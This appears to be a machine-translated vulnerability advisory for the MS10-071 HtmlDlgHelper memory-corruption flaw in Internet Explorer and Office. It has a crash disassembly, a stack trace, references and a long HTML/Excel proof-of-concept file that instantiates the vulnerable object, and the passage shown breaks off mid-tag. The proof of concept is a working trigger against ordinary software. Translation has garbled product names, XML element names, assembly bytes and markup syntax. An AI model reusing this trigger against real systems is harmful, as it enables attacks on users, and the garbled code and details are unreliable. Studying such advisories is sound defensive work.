Microsoft IE HtmlDlgHelper class Memory Corruption Vulnerability (MS10-071) and repair

Affected Versions:
Microsoft Iot Explorer 8.0
Microsoft Internet Explorer 7.0 vulnerability description:

Internet Explorer is a WEB browser bound by default in Windows.

In Windows, the HtmlDlgHelper Class Object (CLASSID: 3050f4e1-98b5-11cf-bb82-00aa00bdce0b) in Office documents (such as. XLS and. DOC) has the Memory Corruption Vulnerability. The mshtmled. dll module in Internet Explorer triggers this vulnerability in mshtmled. dll when the CHtmlDlgHelper class destructor is called to access uninitialized memory. The following is a code segment with a vulnerability:

Mshtmled! ReleaseInterface:
42b919c0 8bff mov edi, edi
42b919c2 55 push ebp
42b919c3 8bec mov ebp, esp
42b919c5 8bda-8 mov eax, dword ptr [ebp + 8] ss: 0023: 0013d104 = 00310065
42b919c8 85c0 test eax, eax
42b919ca 7406 je mshtmled! ReleaseInterface + 0x12 (42b919d2) [br = 0]
42b919cc 8b08 mov ecx, dword ptr [eax] ds: 0023: 00310065
42b919ce 50 push eax
42b919cf ff5108 call dword ptr [ecx + 8] ds: 0023: 7d02029c = 2a2c277a

Eax = 00310065 ebx = 00000000 ecx = 7d020294 edx = df0b3d60 esi = 001 edbdc edi = 00000000
Eip = 2a2c277a esp = 0013d0f4 ebp = 0013d0fc iopl = 0 nv up ei pl nz na pe nc
Cs = 001b ss = 0023 ds = 0023 es = 0023 fs = 003b gs = 0000 efl = 00000206

Stack Trace:
<Unloaded_ion.dll> + 0x2a2c2779
Mshtmled! ReleaseInterface + 0x12
Mshtmled! CHtmlDlgHelper ::~ CHtmlDlgHelper + 0x10
Mshtmled! ATL: CComAggObject <CHtmlDlgHelper>: 'scalar deleting destructor + 0xd
Mshtmled! ATL: CComAggObject <CHtmlDlgHelper>: Release + 0x27
VBE6! RtcStrConvVar + 0xbd65
VBE6! RtcSetDatabaseLcid + 0xa823
EXCEL! Ordinal41 + 0xd2ad0
EXCEL! Ordinal41 + 0x14082a
USER32! CallWindowProcW + 0x1b
Instruction Address: 0x000000002a2c277a
<* Reference
Http://secunia.com/advisories/41271/
Http://www.coresecurity.com/content/MS-Office-HtmlDlgHelper-memory-corruption
Http://www.microsoft.com/technet/security/bulletin/MS10-071.mspx? Pf = true
Http://www.us-cert.gov/cas/techalerts/TA10-285A.html
*>
Test method:
 
<Html xmlns: v = "urn: schemas-microsoft-com: vml"
Xmlns: o = "urn: schemas-microsoft-com: office"
Xmlns: x = "urn: schemas-microsoft-com: office: excel">

<Head>
<Meta http-equiv = Content-Type content = "text/html; charset = windows-1252">
<Meta name = ProgId content = Excel. Sheet>
<Meta name = Generator content = "Microsoft Excel 10">
<! -- [If! Mso]>
<Style>
V: * {behavior: url (# default # VML );}
O: * {behavior: url (# default # VML );}
X: * {behavior: url (# default # VML );}
. Shape {behavior: url (# default # VML );}
</Style>
<! [Endif] --> <! -- [If gte mso 9]> <xml>
<O: DocumentProperties>
<O: LastAuthor> TEST </o: LastAuthor>
<O: LastSaved> 2010-08-03T05: 19: 51Z </o: LastSaved>
<O: Version> 10.6858 </o: Version>
</O: DocumentProperties>
<O: OfficeDocumentSettings>
<O: DownloadComponents/>
</O: OfficeDocumentSettings>
</Xml> <! [Endif] -->

<! -- [If gte mso 9]> <xml>
<X: ExcelWorkbook>
<X: ExcelWorksheets>
<X: ExcelWorksheet>
<X: Name> test </x: Name>
<X: WorksheetOptions>
<X: CodeName> Sheet1 </x: CodeName>
<X: Selected/>
<X: DoNotDisplayGridlines/>
<X: ProtectContents> False </x: ProtectContents>
<X: ProtectObjects> False </x: ProtectObjects>
<X: ProtectScenarios> False </x: ProtectScenarios>
</X: WorksheetOptions>
</X: ExcelWorksheet>
</X: ExcelWorksheets>
<X: Running wheight> 9345 </x: Running wheight>
<X: Faster wwidth> 13260 </x: Faster wwidth>
<X: WindowTopX> 240 </x: WindowTopX>
<X: WindowTopY> 60 </x: WindowTopY>
<X: ProtectStructure> False </x: ProtectStructure>
<X: ProtectWindows> False </x: ProtectWindows>
</X: ExcelWorkbook>
</Xml> <! [Endif] --> <! -- [If gte mso 9]> <xml>
<O: shapedefaults v: ext = "edit" spidmax = "1026"/>
</Xml> <! [Endif] --> <! -- [If gte mso 9]> <xml>
<O: shapelayout v: ext = "edit">
<O: idmap v: ext = "edit" data = "1"/>
</O: shapelayout> </xml> <! [Endif] -->
</Head>

<Body link = blue vlink = purple>

<Table x: str border = 0 cellpadding = 0 cellspacing = 0 width = 64 style = border-collapse:
Collapse; table-layout: fixed; width: 48pt>
<Col width = 64 style = width: 48pt>
<Tr height = 17 style = height: 12.75pt>
<Td height = 17 width = 64 style = height: 12.75pt; width: 48pt align = left
Valign = top> <! -- [If gte vml 1]> <v: shapetype id = "_ x1__t201" coordsize = "21600,21600"
O: spt = "201" path = "m, l, 21600r21600, l21600, xe">
<V: stroke joinstyle = "miter"/>
<V: path shadowok = "f" o: extrusionok = "f" strokeok = "f" fillok = "f"
O: connecttype = "rect"/>
<O: lock v: ext = "edit" shapetype = "t"/>
</V: shapetype> <v: shape id = "_ x1__s1025" type = "# _ x1__t201" style = position: absolute;
Margin-left: 0; margin-top: 0; width: 48pt; height: 12.75pt; z-index: 1
Strokecolor = "windowText [64]" o: insetmode = "auto">
<! [If gte mso 9]> <o: title = "\"/>
<! [Endif]> <x: ClientData ObjectType = "Pict">
<X: SizeWithCells/>
<X: CF> Pict </x: CF>
<X: AutoPict/>
</X: ClientData>
</V: shape> <! [Endif] --> <! [If! Vml]> <span style = mso-ignore: vglayout;
Position: absolute; z-index: 1; margin-left: 0px; margin-top: 0px; width: 64px;
Height: 17px> <! [Endif]>

<Object classid = "CLSID: 3050F4E1-98B5-11CF-BB82-00AA00BDCE0B" id = obj> </object>

<! [If! Vml]> </span> <! [Endif]> <span
Style = mso-ignore: vglayout2>
<Table cellpadding = 0 cellspacing = 0>
<Tr>
<Td height = 17 width = 64 style = height: 12.75pt; width: 48pt> </td>
</Tr>
</Table>
</Span> </td>
</Tr>
<! [If supportMisalignedColumns]>
<Tr height = 0 style = display: none>
<Td width = 64 style = width: 48pt> </td>
</Tr>
<! [Endi